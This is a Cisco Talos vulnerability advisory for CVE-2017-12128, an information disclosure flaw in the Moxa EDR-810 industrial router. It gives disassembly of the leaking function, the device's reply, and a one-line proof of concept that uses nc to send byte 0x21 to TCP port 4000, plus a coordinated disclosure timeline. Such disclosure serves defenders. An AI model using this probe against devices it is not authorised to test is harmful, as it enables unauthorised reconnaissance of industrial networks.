CVE-2017-12128: TALOS-2017-0480 || Cisco Talos Intelligence Group

Summary

An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

https://www.moxa.com/product/EDR-810.htm

CVSSv3 Score

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-213 - Intentional Information Exposure

Details

If 0x21 is set to the device over TCP/4000 the device will reply with:

!..Model    EDR-810-VPN-2GSFP
Name    Firewall/VPN Router 05470
Serial No   1324
Firmware Ver.   V3.13 build 16051215.
Location    Device Location
--------------------------------------------------
LAN Address 192.168.127.254
Netmask 255.255.255.0
Gateway 0.0.0.0
MAC Address 00-90-E8-00-01-02

When the server detects 0x21 it calls the “DoShowInfo” function. This function first gathers system info, then sends it back to the client.

LDR             R2, =aSS_0 ; "%s\t%s\n"
SUB             R1, R11, #-s
SUB             R3, R11, #-var_128
MOV             R0, R1  ; s
MOV             R1, R2  ; format
LDR             R2, =aModel ; "Model"
BL              sprintf
...
LDR             R2, =aSS_0 ; "%s\t%s\n"
SUB             R1, R11, #-s
SUB             R3, R11, #-var_640
SUB             R3, R3, #0xC
SUB             R3, R3, #8
MOV             R0, R1  ; s
MOV             R1, R2  ; format
LDR             R2, =aName ; "Name"
BL              sprintf
...
LDR             R2, =aSD_0 ; "%s\t%d\n"
SUB             R3, R11, #-var_12
LDRB            R1, [R3]
LDRB            R3, [R3,#1]
ORR             R3, R1, R3,LSL#8
SUB             R1, R11, #-s
MOV             R0, R1  ; s
MOV             R1, R2  ; format
LDR             R2, =aSerialNo ; "Serial No"
...
LDR             R2, =aSSS ; "%s\t%s %s\n"
SUB             R1, R11, #-s
SUB             R3, R11, #-var_128
SUB             R0, R11, #-var_170
STR             R0, [SP,#0x9A4+var_9A4]
MOV             R0, R1  ; s
MOV             R1, R2  ; format
LDR             R2, =aFirmwareVer_ ; "Firmware Ver."
...
LDR             R2, =aSS_0 ; "%s\t%s\n"
SUB             R1, R11, #-s
SUB             R3, R11, #-var_640
SUB             R3, R3, #0xC
SUB             R3, R3, #8
ADD             R3, R3, #0x29
MOV             R0, R1  ; s
MOV             R1, R2  ; format
LDR             R2, =aLocation ; "Location"
...
BL              Get_IF_IP_MASK
SUB             R3, R11, #-var_970
SUB             R3, R3, #0xC
SUB             R3, R3, #4
SUB             R2, R11, #-var_130
MOV             R0, R3
MOV             R1, R2
BL              Get_IF_MAC
...
BL              net_data_send

Exploit Proof-of-Concept

In order to trigger the information disclosure vulnerability send 0x21 to the device over TCP/4000.

echo -ne '\x21' | nc 127.0.0.1 4000

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release

Discovered by Carlos Pacho of Cisco Talos.